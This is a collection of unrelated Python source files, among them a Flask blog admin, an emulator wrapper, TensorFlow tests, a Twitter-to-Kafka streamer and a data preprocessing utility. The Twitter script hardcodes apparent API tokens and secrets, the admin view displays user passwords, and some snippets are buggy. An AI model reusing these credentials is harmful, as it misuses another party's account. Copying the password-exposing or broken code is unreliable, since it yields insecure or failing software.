User,Post,Tag,Say,Link\nfrom flask_admin import Admin,BaseView,expose,AdminIndexView\nfrom flask_admin.contrib.sqla import ModelView\n\n\nadmin=Admin(\n name='My Blog',\n index_view=AdminIndexView(\n template='index.html',\n name=u'Admin',\n url='/admin'\n ))\n\n\nclass MyBaseView(BaseView):\n\t@login_required\n\tdef is_accessible(self):\n\t\treturn current_user.is_authenticated\n\nclass NewPostView(MyBaseView):\n\t@expose('/')\n\tdef new_post(self):\n\t\treturn redirect(url_for('main.new_post'))\n\nclass NewSayView(MyBaseView):\n\t@expose('/')\n\tdef new_say(self):\n\t\treturn redirect(url_for('main.new_say'))\n\nclass NewLinkView(MyBaseView):\n\t@expose('/')\n\tdef new_link(self):\n\t\treturn redirect(url_for('main.new_link'))\n\n\n\nclass MyModelView(ModelView):\n\t@login_required\n\tdef is_accessible(self):\n\t\treturn current_user.is_authenticated\n\nclass UserView(MyModelView):\n\tcan_create=False\n\tcolumn_labels={\n\t'id':u'序号',\n\t'name':u'名称',\n\t'email':u'电子邮件',\n\t'password':u'密码',\n\t}\n\tcolumn_list=('id','name','email','password')\n\tdef __init__(self,session,**kwargs):\n\t\tsuper(UserView,self).__init__(User,session,**kwargs)\n\n\nclass PostView(MyModelView):\n\tcan_create=False\n\tcolumn_labels={\n 'id':u'序号',\n 'category':u'分类',\n\t'tag_string':u'标签',\n 'title':u'标题',\n 'create_time':u'发布时间',\n\t'view':u'浏览',\n 'brief':u'摘要',\n 'content':u'文章内容'\n }\n\tcolumn_list=('id','category','tag_string','title','create_time','view','brief','content')\n\tdef __init__(self,session,**kwargs):\n\t\tsuper(PostView,self).__init__(Post,session,**kwargs)\n\n\nclass SayView(MyModelView):\n\tcan_create=False\n\tcolumn_labels={\n 'id':u'序号',\n 'create_time':u'发布时间',\n\t'like':u'点赞',\n 'content':u'说说内容'\n }\n\tcolumn_list=('id','create_time','like','content')\n\tdef __init__(self,session,**kwargs):\n\t\tsuper(SayView,self).__init__(Say,session,**kwargs)\n\nclass LinkView(MyModelView):\n\tcan_create=False\n\tcolumn_labels={\n 'id':u'序号',\n 'create_time':u'时间',\n 'name':u'名称',\n 'link':u'链接'\n }\t\n\tcolumn_list=('id','create_time','name','link')\n\tdef __init__(self,session,**kwargs):\n\t\tsuper(LinkView,self).__init__(Link,session,**kwargs)\n\n\n","sub_path":"app/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":2393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"361670413","text":"\"\"\"Wrapper for the gtemu emulator\"\"\"\n\nimport itertools\nimport sys\n\nimport _gtemu\n\nassert \"asm\" not in sys.modules, \"gtemu needs to load before anything else touches asm\"\nimport asm # noqa: E402 isort:skip\n\n\nBLANK_RAM = bytearray([0 for _ in range(1 << 15)])\n\n\ndef _make_state_field_accessors(name):\n \"\"\"Return a descriptor that accesses the fields of the state\n\n Just because I don't yet know how to create CFFI structs, so I'm starting with a dict,\n and CFFI seems to do the conversion just fine.\n \"\"\"\n\n def _getter(self):\n state = self._state\n state_is_dict = isinstance(state, dict)\n try:\n return state[name] if state_is_dict else getattr(state, name)\n except KeyError:\n return 0 # Uninitialised.\n\n def _setter(self, value):\n state = self._state\n if isinstance(state, dict):\n state[name] = value\n else:\n setattr(state, name, value)\n\n return property(\n _getter,\n _setter,\n doc=\"Get or set the current state of the \" + name + \" register\",\n )\n\n\nclass Emulator(object):\n def __init__(self):\n self._state = {}\n self._last_pc = None\n self._print = False\n self.breakpoints = set()\n\n def _step(self):\n \"\"\"Run a single step of the interpreter\"\"\"\n # Store the current PC, so that we can return it as next_instruction\n # This is needed because of the pipeline\n self._last_pc = self.PC\n self._state = _gtemu.lib.cpuCycle(self._state)\n if self._print:\n print(self.state)\n\n locals().update(\n {\n field: _make_state_field_accessors(field)\n for field in [\"PC\", \"IR\", \"D\", \"AC\", \"X\", \"Y\", \"OUT\"]\n }\n )\n\n @property\n def next_instruction(self):\n return self._last_pc\n\n @next_instruction.setter\n def next_instruction(self, address):\n \"\"\"Set program execution to proceed from `address`\n\n This sets the PC to address + 1, having loaded the instruction at address,\n as if we had just executed address - 1.\n \"\"\"\n # To start from an address, we need to fill the pipeline with the instruction at address\n # and set PC to address + 1.\n address = asm.symbol(address) or address\n self.PC = address + 1\n self.IR = _gtemu.lib.ROM[address][0]\n self.D = _gtemu.lib.ROM[address][1]\n self._last_pc = address\n\n def run_for(self, instructions):\n \"\"\"Run the emulator for a fixed number of cycles\n\n Will stop at breakpoints if they are hit,\n but always executes at least one cycle\n\n Returns the number of cycles executed.\n \"\"\"\n for i in range(instructions):\n self._step()\n if self._last_pc in self.breakpoints:\n return i + 1\n return instructions\n\n def run_to(self, address, max_instructions=1000):\n \"\"\"Run the emulator until it is about to execute the instruction at `address`\n\n Due to the pipeline, this means that for the previous instruction PC was `address`,\n and therefore we have loaded the instruction.\n\n Will stop at breakpoints if they are hit,\n but always executes at least one cycle\n \"\"\"\n address = asm.symbol(address) or address\n iterator = (\n range(max_instructions)\n if max_instructions is not None\n else itertools.count()\n )\n for i, _ in enumerate(iterator):\n self._step()\n if self._last_pc == address or self._last_pc in self.breakpoints:\n return i + 1\n raise ValueError(\"Did not hit address in %d instructions\" % (max_instructions,))\n\n @property\n def state(self):\n \"\"\"Return a string representation of the current state\"\"\"\n registers = [\n (\"PC\", 2),\n (\"IR\", 1),\n (\"D\", 1),\n (\"AC\", 1),\n (\"X\", 1),\n (\"Y\", 1),\n (\"OUT\", 1),\n ]\n heading = \" \".join(\n [r.rjust(w * 2 + 2) for r, w in registers] + [\"Loaded instruction\"]\n )\n separator = \" \".join(\n [\"-\" * (2 * w + 2) for _, w in registers] + [\"------------------\"]\n )\n values = \" \".join(\n [(\"{:#0%dx}\" % (w * 2 + 2,)).format(getattr(self, r)) for r, w in registers]\n + [asm.disassemble(self.IR, self.D)]\n )\n return \"\\n\".join([heading, separator, values])\n\n def zero_memory(self):\n _gtemu.ffi.buffer(RAM)[:] = BLANK_RAM\n # Needed for bit shuffling\n _gtemu.ffi.buffer(RAM)[0b1000_0000] = b\"\\x01\"\n\n\nROM = _gtemu.lib.ROM\nRAM = _gtemu.lib.RAM\n\n# On load, populate the ROM from dev.py, and load the labels\n# HACK!\n# dev.py is not expecting to run as a module, and will naturally fail\n# in multiple ways.\n\n# We create a 'Reset' label, and stub out writeRomFiles() to prevent\n# breakage, and set sys.argv to ['dev.py']\n\nasm.label(\"Reset\") # Creates it at 0x00\n\n\ndef _stub(*args, **kwargs):\n pass\n\n\n_original_writeRomFiles = asm.writeRomFiles\n_original_enableListing = asm.enableListing\n_original_disableListing = asm.disableListing\n_original_argv = sys.argv\nasm.writeRomFiles = _stub\nasm.enableListing = _stub\nasm.disableListing = _stub\nsys.argv = [\"dev.py\"]\ntry:\n import dev # noqa: F401 - Imported for a side effect\nfinally:\n asm.disableListing = _original_disableListing\n asm.enableListing = _original_enableListing\n asm.writeRomFiles = _original_writeRomFiles\n sys.argv = _original_argv\n\n\ndef gen_rom_data():\n for opcode, operand in zip(asm._rom0, asm._rom1):\n yield opcode\n yield operand\n\n\nrom_data = bytearray(gen_rom_data())\n_gtemu.ffi.buffer(ROM)[0 : len(rom_data)] = rom_data\n\n\n__all__ = [\"Emulator\", \"RAM\", \"ROM\"]\n","sub_path":"Contrib/psr/Forth/tests/gtemu.py","file_name":"gtemu.py","file_ext":"py","file_size_in_byte":5801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"616261268","text":"import numpy as np\nimport tensorflow as tf\n\n\ndef test_log():\n x = tf.constant([0, 0.5, 1, 5])\n y = tf.math.log(x)\n print(y)\n\n\ndef test_reduce_sum():\n # x 的 shape 为 (2, 3)\n x = tf.constant([[1, 1, 1], [1, 1, 1]])\n\n # 不指定 axis,计算所有元素加和\n v = tf.reduce_sum(x).numpy()\n assert v == 6\n\n # 指定 axis=0,[1, 1, 1] + [1, 1, 1] = [2, 2, 2]\n v = tf.reduce_sum(x, 0).numpy()\n assert np.array_equal(v, np.array([2, 2, 2]))\n\n # 指定 axis=1, [1, 1] + [1, 1] + [1, 1] = [3, 3]\n v = tf.reduce_sum(x, 1).numpy()\n assert np.array_equal(v, np.array([3, 3]))\n\n # 保留维度\n v = tf.reduce_sum(x, 1, keepdims=True).numpy()\n assert np.array_equal(v, np.array([[3], [3]]))\n\n # 从两个维度同时 reduce\n # [1,1,1]+[1,1,1]=[2,2,2]\n # 2+2+2=6\n v = tf.reduce_sum(x, [0, 1]).numpy()\n assert v == 6\n","sub_path":"src/tf_test/math_test.py","file_name":"math_test.py","file_ext":"py","file_size_in_byte":878,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"108359901","text":"\"\"\" Faça um programa que calcule o número médio de alunos por turma. Para\nisto, peça a quantidade de turmas e a quantidade de alunos para cada turma.\nAs turmas não podem ter mais de 40 alunos. \"\"\"\nturmas = int(input('Quantas turmas a serem informadas\\n'))\nnum = 0\nmedia = 0\nwhile num < turmas :\n alunos = int(input('Informe o numero de alunos matriculados na turma:\\n'))\n if alunos > 0 and alunos <= 40:\n media += alunos\n num= num + 1\n else:\n print('Infomação incorreta')\nmedia = media / turmas\nprint(\"A media de Alunos por turma é: \",media)","sub_path":"ExercicioRepeticao1.py","file_name":"ExercicioRepeticao1.py","file_ext":"py","file_size_in_byte":580,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"480741408","text":"# -*- coding: utf-8 -*-\nimport tweepy\nfrom tweepy.streaming import json\nfrom kafka import KafkaProducer\n\n# Запуск zookeeper и kafka\n# zookeeper-server-start /usr/local/etc/kafka/zookeeper.properties\n# kafka-server-start /usr/local/etc/kafka/server.properties\n\n# Создание kafka topic\n# kafka-topics --create --zookeeper localhost:2181 --replication-factor 1 --partitions 1 --topic tweets\n\n\nproducer = KafkaProducer(bootstrap_servers=\"localhost:9092\")\ntopic_name = \"tweets\"\n\nconsumer_token = \"pMtrIkJf2DwbvvEfjRCvq9yvF\"\nconsumer_secret = \"QAhPzTykUImbW84EjsVqyOWc0RigCtzgQI8BpbQqg1hXb766jI\"\naccess_token = \"4196894355-3R3wcEGy4Bc25rhnTPkOxfCmMbFABmehQy6qScl\"\naccess_secret = \"UqvOEoaIAwR3E67ZBq2L7eaXCcN42c8vLvBXh6u9B4uL3\"\nauth = tweepy.OAuthHandler(consumer_token, consumer_secret)\nauth.set_access_token(access_token, access_secret)\napi = tweepy.API(auth)\n\n# Набор id пользователей для прослушки\nuser_ids = [\"285532415\", \"147964447\", \"34200559\", \"338960856\", \"200036850\", \"72525490\", \"20510157\", \"99918629\"]\n\n\n# «Прослушиваем» твиты и проверяем, получили ли твит от нужного id\nclass TweetsStreamListener(tweepy.StreamListener):\n def on_data(self, raw_data):\n data = json.loads(raw_data)\n # проверяем, что есть поле id в json-структуре у пользователя\n if \"user\" in data:\n user_id = data[\"user\"][\"id_str\"]\n if user_id in user_ids:\n screen_name = data[\"user\"][\"screen_name\"]\n print('Time={}\\tID={}\\tscreen_name={}'.format(data[\"created_at\"], user_id, screen_name))\n producer.send(topic_name, key=screen_name.encode())\n\n\n# Создаем объект прослушивания\nlistener = TweetsStreamListener()\n# Устанавливаем стрим для АПИ твиттера с созданной «прослушкой»\nstream = tweepy.Stream(auth=api.auth, listener=listener)\n# Начинаем фильтрацию сообщений\nstream.filter(follow=user_ids)\n","sub_path":"tweets_cnt/tweets-kafka.py","file_name":"tweets-kafka.py","file_ext":"py","file_size_in_byte":2103,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"596133441","text":"# coding=utf-8\nfrom mockito import *\nfrom django.test import TestCase\nfrom recipes import mchef, loggers\nimport os\n\n\nclass MIChefTest(TestCase):\n\n def setUp(self):\n self.name = \"name\"\n self.cookbook_url = \"cookbook_url\"\n msg = mock()\n when(loggers).set_info_log(msg).thenReturn(None)\n when(loggers).set_error_log(msg).thenReturn(None)\n self.chef = mchef.MIChef(self.name, self.cookbook_url)\n\n def test_update_master_server_no_ok(self):\n when(os).system(any()).thenReturn(0)\n result = self.chef.update_master_server()\n self.assertIsNone(result)\n\n\n def test_update_master_server_200(self):\n when(os).system(any()).thenReturn(1)\n result = self.chef.update_master_server()\n self.assertIsNotNone(result)\n\n def test_remove_master_server(self):\n when(os).system(any()).thenReturn(0)\n result = self.chef.update_master_server()\n self.assertIsNone(result)\n\n def test_remove_master_server_fail(self):\n when(os).system(any()).thenReturn(1)\n result = self.chef.update_master_server()\n self.assertIsNotNone(result)\n\n\nclass MINodeTest(TestCase):\n\n def setUp(self):\n msg = mock()\n when(loggers).set_info_log(msg).thenReturn(None)\n when(loggers).set_error_log(msg).thenReturn(None)\n self.name = \"name\"\n self.chef = mchef.MINode(self.name)\n\n def test_delete_node_client(self):\n when(os).system(any()).thenReturn(0)\n result = self.chef.delete_node_client()\n self.assertIsNone(result)\n\n def test_delete_node_client_no_200(self):\n when(os).system(any()).thenReturn(1)\n result = self.chef.delete_node_client()\n self.assertIsNotNone(result)\n\n def test_add_node_run_list(self):\n software = 'GE_Software'\n when(os).system(any()).thenReturn(0)\n result = self.chef.add_node_run_list(software)\n self.assertIsNone(result)\n\n def test_add_node_run_list_no_200(self):\n software = 'GE_Software'\n when(os).system(any()).thenReturn(1)\n result = self.chef.add_node_run_list(software)\n self.assertIsNotNone(result)\n","sub_path":"recipes/tests/test_chef.py","file_name":"test_chef.py","file_ext":"py","file_size_in_byte":2167,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"297944660","text":"import torch\nimport torch.distributed\nimport numpy as np\nimport time\nfrom initialize import init_distributed\nfrom arguments import parse_args, get_args\nfrom model.linear import ColumnParallelLinear\nfrom utils import print_rank_0\nfrom model.cross_entropy import parallel_cross_entropy\nfrom model.mlp import ParallelMLP\n\n\ndef train(hidden_sizes, num_epochs=50):\n \n # Initialize torch.distributed\n init_distributed()\n\n print_rank_0('AutoMP: training MLP...')\n # Use MNIST data\n train_data = np.genfromtxt('data/digitstrain.txt', delimiter=\",\")\n train_X = torch.tensor(train_data[:, :-1], dtype=torch.float, device=torch.cuda.current_device())\n train_Y = torch.tensor(train_data[:, -1], dtype=torch.int64, device=torch.cuda.current_device())\n print_rank_0(f'train_X shape: {train_X.size()}')\n print_rank_0(f'train_Y shape: {train_Y.size()}')\n\n num_features = train_X.size()[1]\n num_classes = 10\n assert num_features == 28*28\n mlp = ParallelMLP(num_features=num_features, num_classes=num_classes, hidden_sizes=hidden_sizes)\n print_rank_0('AutoMP: Successfully initialized ParallelMLP')\n\n criterion = torch.nn.CrossEntropyLoss()\n optimizer = torch.optim.SGD(mlp.parameters(), lr=0.01)\n\n # num_epochs = 500\n num_train_samples = train_X.size()[0]\n batch_size = num_train_samples\n tot_time = 0\n for epoch in range(num_epochs):\n start_time = time.time()\n train_loss = 0\n for sample_idx in range(0, num_train_samples, batch_size):\n mini_batch = train_X[sample_idx:sample_idx+batch_size, ...]\n labels = train_Y[sample_idx:sample_idx+batch_size]\n # Forward pass\n logits = mlp(mini_batch)\n # Note: torch.nn.CrossEntropyLoss does not need one hot encoding\n loss = criterion(logits, labels)\n # loss = parallel_cross_entropy(logits, labels)\n train_loss += loss\n # Backward pass\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n train_loss /= (num_train_samples / batch_size)\n # if epoch % 50 == 0:\n print_rank_0(f'Epoch Number {epoch}: train loss: {train_loss}, time: {time.time()-start_time}')\n tot_time += time.time()-start_time\n print_rank_0(f'!!! AVG EPOCH TIME: {tot_time/num_epochs}')\n\n\n\n\n\n # output = parallel_linear.forward(train_X)\n # # take a look at this shit\n # print_rank_0(str(output))\n # print_rank_0(str(output.shape))\n #\n #\n # loss = parallel_cross_entropy(output, train_Y)\n # print_rank_0('loss')\n # print_rank_0(str(loss))\n # print_rank_0(str(loss.shape))\n\n\nif __name__ == '__main__':\n # Parse command line arguments\n parse_args()\n\n args = get_args()\n hidden_sizes = args.hidden_sizes\n num_epochs = args.num_epochs\n\n print(hidden_sizes, num_epochs)\n\n train(hidden_sizes, num_epochs=num_epochs)","sub_path":"train_mlp.py","file_name":"train_mlp.py","file_ext":"py","file_size_in_byte":2905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"488194482","text":"from app import db, ma\nfrom models.base import BaseModel, BaseSchema\nfrom marshmallow import fields\n\n\nclass Reaction(db.Model, BaseModel):\n\n __tablename__ = \"reactions\"\n\n name = db.Column(db.String(25), nullable=True)\n\n image = db.Column(db.String(25), nullable=True)\n\nclass ReactionSchema(ma.SQLAlchemyAutoSchema):\n class Meta:\n model = Reaction\n load_instance = True\n\n","sub_path":"backend/models/reaction.py","file_name":"reaction.py","file_ext":"py","file_size_in_byte":396,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"53424212","text":"# tuples are a sequence and are immutable (cannot delete or update items)\n\ntup = (\"oranges\", \"apples\", \"bananas\")\n\n# get first item of tuple\ntup[0]\n\n# get first two items of tuple\ntup[0:2]\n\n# can add two tuples together\ntup2 = (12, 14)\ntup + tup2\n\n# delete entire tuple\ndel tup\n\n#length of tuple\nlen(tup2)\n\n#multiply\ntup3 = (\"HA\")\ntup3 * 4","sub_path":"2.8-tuples-data-structure/Tuples.py","file_name":"Tuples.py","file_ext":"py","file_size_in_byte":339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"428572257","text":"#!/usr/bin/env python\n\nfrom evdev import InputDevice, ecodes, list_devices\nfrom select import select\n\nkeys = \"X^1234567890XXXXqwertzuiopXXXXasdfghjklXXXXXyxcvbnmXXXXXXXXXXXXXXXXXXXXXXX\"\ndev = InputDevice(\"/dev/input/event14\")\n\nbarcode = \"\"\nwhile True:\n r,w,x = select([dev], [], [])\n\n for event in dev.read():\n if event.type == 1 and event.value == 1:\n barcode += (keys[event.code])\n if (len (barcode)) > 13:\n break\n \nprint(\"Barcode:\" + barcode[:-1])","sub_path":"PX_GUI/test_barcode3.py","file_name":"test_barcode3.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"14788853","text":"from data_vk.apivk import *\nimport unittest\n\n\n# my_user_id = 486369485\nfriend_user_id = 5967930\nclass TestVkAPi(unittest.TestCase):\n\n def test_get_dialogs(self):\n dialogs = get_dialogs()\n self.assertIsNotNone(dialogs)\n self.assertTrue(type(dialogs['items']) is list)\n self.assertTrue(type(dialogs['count']) is int)\n print(dialogs)\n\n def test_get_history(self):\n history = get_all_history(friend_user_id)\n print(history)\n","sub_path":"data_vk/apivk_tests.py","file_name":"apivk_tests.py","file_ext":"py","file_size_in_byte":475,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"64095385","text":"import requests\n\nclass Api(object):\n\n def process_item(self, item, spider):\n settings = spider.settings\n apiUrl = (settings.get('SCRAPPER_API_URL'))\n\n if isinstance(apiUrl, str):\n requests.post(apiUrl, item)\n\n return item","sub_path":"scrapper/pipeline/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"198947844","text":"\na_list = dict()\n\nclass our_list:\n def __init__(self):\n\n print(\"Hello\")\n\n def add(self, name, age, major, country):\n a_list[\"name\"] = name\n a_list[\"age\"] = age\n a_list[\"Faculty\"] = faculty\n a_list[\"country\"] = country\n return a_list\n\n def a_remove(self, key):\n del a_list[key]\n return a_list\n\n def a_modify(self, name, major, country):\n a_list.update({\"name\":name})\n a_list.update({\"Faculty\": faculty})\n a_list.update({\"country\":country})\n return a_list\n\n def a_lookup(self, i):\n for key in a_list.keys():\n if key == i:\n return \"found\"\n else:\n return \"not found\"\n\n\nif __name__ == \"__main__\":\n p = our_list()\n\n print(p.add(\"Umutoni\", 20, \"CS\", \"Rwanda\"))\n\n print(p.a_remove(\"Faculty\"))\n\n print(p.a_modify(\"Liplan\", \"CS\", \"GC\"))\n\n print(p.a_lookup(\"name\"))\n\n\n\n","sub_path":"question4.py","file_name":"question4.py","file_ext":"py","file_size_in_byte":931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"422954466","text":"# coding=utf-8\n################################################################################\n#\n# Copyright (c) 2016 eBay Software Foundation.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n#################################################################################\n#\n# @Author: Mingkuan Liu\n# @Email: mingkliu@ebay.com\n# @Date: 2016-07-24\n#\n##################################################################################\n\n\n\"\"\"Utilities for extracting and preprocessing training and evaluation data with tokenizing, encoding inputs etc.\n The DataSet.tar.gz file in the rawdata folder contains a sample dataset used in classification task. It contains\n three files: TrainPairs, EvalPairs and targetID.\n * The TrainPairs, EvalPairs are training/evaluation corpus data in the\n format of tsv file with columns of SourceSequence, TargetSequence, TargetSeqId.\n * The targetID file contains the whole target sequence space and their IDs in the format of: targetSequence, targetSequenceID.\n\n\"\"\"\n\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\n# from builtins import str\nfrom builtins import str\nimport gzip\nimport os\nimport re\nimport tarfile\nimport codecs\nimport random\nimport numpy as np\nimport sys\nimport text_encoder\nimport tokenizer\n\n\nfrom six.moves import urllib\n\nfrom tensorflow.python.platform import gfile\n\n\n\ndef maybe_download(directory, filename, url):\n \"\"\"Download filename from url unless it's already in directory.\"\"\"\n if not os.path.exists(directory):\n print(\"Creating directory %s\" % directory)\n os.mkdir(directory)\n filepath = os.path.join(directory, filename)\n if not os.path.exists(filepath):\n print(\"Downloading %s to %s\" % (url, filepath))\n filepath, _ = urllib.request.urlretrieve(url, filepath)\n statinfo = os.stat(filepath)\n print(\"Succesfully downloaded\", filename, statinfo.st_size, \"bytes\")\n return filepath\n\n\ndef gunzip_file(gz_path, new_path):\n \"\"\"Unzips from gz_path into new_path.\"\"\"\n print(\"Unpacking %s to %s\" % (gz_path, new_path))\n with gzip.open(gz_path, \"rb\") as gz_file:\n with open(new_path, \"wb\") as new_file:\n for line in gz_file:\n new_file.write(line)\n\n\ndef get_data_set(rawDir, processedDir):\n train_path = os.path.join(processedDir, \"Train\")\n dev_path = os.path.join(processedDir, \"Eval\")\n if not (gfile.Exists(train_path +\".target\") and gfile.Exists(train_path +\".source\")):\n corpus_file = os.path.join(rawDir, \"DataSet.tar.gz\")\n if not gfile.Exists(corpus_file):\n print('Error! No corups file found at: %s' % corpus_file )\n exit(1)\n print(\"Extracting tar file %s\" % corpus_file)\n #extract out the TrainPairs file\n with tarfile.open(corpus_file, \"r\") as corpus_tar:\n corpus_tar.extractall(processedDir)\n #produce the train corpus file\n with codecs.open( train_path + '.source.Corpus', 'w', 'utf-8' ) as srcFile, \\\n codecs.open(train_path + '.target.Corpus', 'w', 'utf-8') as tgtFile:\n for line in codecs.open( os.path.join(processedDir, 'TrainPairs'), 'r', 'utf-8'):\n info = line.lower().strip().split('\\t') # srcSeq, tgtSeq, tgtId = line.strip().split('\\t')\n if len(info) < 2:\n print('Error train pair data:%s' % line)\n continue\n srcFile.write(info[0] + '\\n')\n tgtFile.write(info[1] + '\\n')\n #produce the eval corpus file\n with codecs.open(dev_path + '.source.Corpus', 'w', 'utf-8') as srcFile, \\\n codecs.open(dev_path + '.target.Corpus', 'w', 'utf-8') as tgtFile:\n for line in codecs.open(os.path.join(processedDir, 'EvalPairs'), 'r', 'utf-8'):\n info = line.lower().strip().split('\\t') # srcSeq, tgtSeq, tgtId = line.strip().split('\\t')\n if len(info) < 2:\n print('Error train pair data:%s' % line)\n continue\n srcFile.write(info[0] + '\\n')\n tgtFile.write(info[1] + '\\n')\n\n return train_path, dev_path\n\n\n\ndef gen_classification_corpus( pairfilename, encodedTargetSpace, encoder, max_seq_length ):\n \"\"\"\n\n :param pairfilename:\n :param encoder:\n :param max_seq_length:\n :return:\n \"\"\"\n Corpus = []\n counter = 0\n for line in codecs.open( pairfilename , \"r\", 'utf-8'):\n info = line.strip().split('\\t')\n if len(info) != 3:\n print(\"File %s has Bad line of training data:\\n %s\" % ( pairfilename, line ) )\n continue\n srcSeq, tgtSeq, tgtId = info\n counter += 1\n if counter % 100000 == 0:\n print(\" reading data line %d\" % counter)\n sys.stdout.flush()\n # verify target sequence correctness\n if tgtId not in set(encodedTargetSpace.keys()):\n print('Error Detected!! trouble in finding targetID in target Space file!! %s' % line)\n continue\n source_tokens = encoder.encode(srcSeq.lower())\n seqlen = len(source_tokens)\n if seqlen > max_seq_length - 1:\n print(\n 'Error Deteced!!! \\n Source Seq:\\n %s \\n Its seq length is:%d, which is longer than MAX_SEQ_LENTH of %d. Try to increase limit!!!!' % (\n srcSeq, seqlen, max_seq_length))\n continue\n source_tokens = source_tokens + [text_encoder.EOS_ID] + [text_encoder.PAD_ID] * (max_seq_length - seqlen - 1)\n Corpus.append( (source_tokens, tgtId ) )\n return Corpus\n\n\ndef get_classification_corpus(processed_data_dir, encoder, max_seq_length):\n \"\"\"\n\n :param processed_data_dir: contains TrainPairs, EvalPairs and targetIDs files\n :param encoder:\n :param max_seq_length:\n :return:\n \"\"\"\n #create Encoded TargetSpace Data\n print(\"Generating classification training corpus .... \")\n encodedFullTargetSpace = {}\n tgtIdNameMap = {}\n encodedFullTargetFile = codecs.open( os.path.join(processed_data_dir, \"encoded.FullTargetSpace\"), 'w', 'utf-8')\n for line in codecs.open( os.path.join(processed_data_dir, \"targetIDs\"), 'r', 'utf-8'):\n tgtSeq, id = line.strip().split('\\t')\n token_ids = encoder.encode(tgtSeq.lower())\n seqlen = len(token_ids)\n if seqlen > max_seq_length-1:\n print( 'Error Deteced!!! \\n Target:\\n %s \\n Its seq length is:%d, which is longer than MAX_SEQ_LENTH of %d. Try to increase limit!!!!' % (tgtSeq, seqlen, max_seq_length ))\n continue\n token_ids = token_ids + [ text_encoder.EOS_ID ] + [ text_encoder.PAD_ID] * (max_seq_length - seqlen -1)\n encodedFullTargetSpace[id] = token_ids\n tgtIdNameMap[id] = tgtSeq\n decoded_tgt = encoder.decode(token_ids)\n subtoken_strings = [encoder._all_subtoken_strings[i] for i in token_ids]\n #debugging\n # encodedFullTargetFile.write(id + '\\t' + tgtSeq.strip() + '\\t' + ','.join([str(i) for i in token_ids]) + '\\t' + ','.join(subtoken_strings) + '\\t' + decoded_tgt + '\\n' )\n encodedFullTargetFile.write(id + '\\t' + tgtSeq.strip() + '\\t' + ','.join([str(i) for i in token_ids]) + '\\n' )\n\n encodedFullTargetFile.close()\n\n #create Encoded Training Corpus: (srcTokens, srcLen, tgtTokens, tgtLen, RelevanceLabel)\n trainingCorpus = gen_classification_corpus( os.path.join(processed_data_dir, \"TrainPairs\" ), encodedFullTargetSpace, encoder, max_seq_length)\n #creat evaluation corpus: (srcTokens, srcLen, tgtLabels)\n evalCorpus = []\n for line in codecs.open( os.path.join(processed_data_dir, \"EvalPairs\" ), \"r\", 'utf-8'):\n info = line.strip().split('\\t')\n if len(info) != 3:\n print(\"EvalFile has Bad line of training data:\\n %s\" % ( line ) )\n continue\n srcSeq, tgtSeq, tgtId = info\n # verify target sequence correctness\n if tgtId not in set(encodedFullTargetSpace.keys()):\n print('Error Detected!! trouble in finding evalPairs targetID in target Space file!! %s' % line)\n continue\n source_tokens = encoder.encode(srcSeq.lower())\n seqlen = len(source_tokens)\n if seqlen > max_seq_length - 1:\n print(\n 'Error Deteced!!! \\n Source Seq:\\n %s \\n Its seq length is:%d, which is longer than MAX_SEQ_LENTH of %d. Try to increase limit!!!!' % (\n srcSeq, seqlen, max_seq_length))\n continue\n source_tokens = source_tokens + [text_encoder.EOS_ID] + [text_encoder.PAD_ID] * (max_seq_length - seqlen - 1)\n # get positive sample\n evalCorpus.append((source_tokens, source_tokens.index(text_encoder.PAD_ID) +1, tgtId ) )\n\n #debugging purpose\n print(\"evalCorpus[1] is:\\n source_tokens: %s \\n source_length: %s \\n tgtId: %s\" % ( str(evalCorpus[1][0]), str(evalCorpus[1][1]), str(evalCorpus[1][2]) ) )\n\n return trainingCorpus, evalCorpus, encodedFullTargetSpace, tgtIdNameMap\n\n\ndef get_search_corpus(processed_data_dir, encoder, max_seq_length):\n \"\"\"\n\n :param processed_data_dir:\n :param encoder:\n :param negative_samples:\n :param max_seq_length:\n :return:\n \"\"\"\n raise NotImplementedError('Search Ranking Task will be supported very soon.')\n\n\ndef get_questionAnswer_corpus(processed_data_dir, encoder, max_seq_length):\n \"\"\"\n\n :param processed_data_dir: contains TrainPairs, EvalPairs and targetIDs files\n :param encoder:\n :param max_seq_length:\n :return:\n \"\"\"\n # note QnA task's data format is the same as Classification task. So we can reuse it.\n\n return get_classification_corpus(processed_data_dir, encoder, max_seq_length)\n\n\n\ndef prepare_raw_data(raw_data_dir, processed_data_dir, vocabulary_size, task_type, max_seq_length):\n \"\"\"Get SSE training-Evaluation data into data_dir, create vocabularies and tokenized data.\n\n Args:\n raw_data_dir: directory contains the raw zipped dataset.\n processed_data_dir: directory in which the processed data sets will be 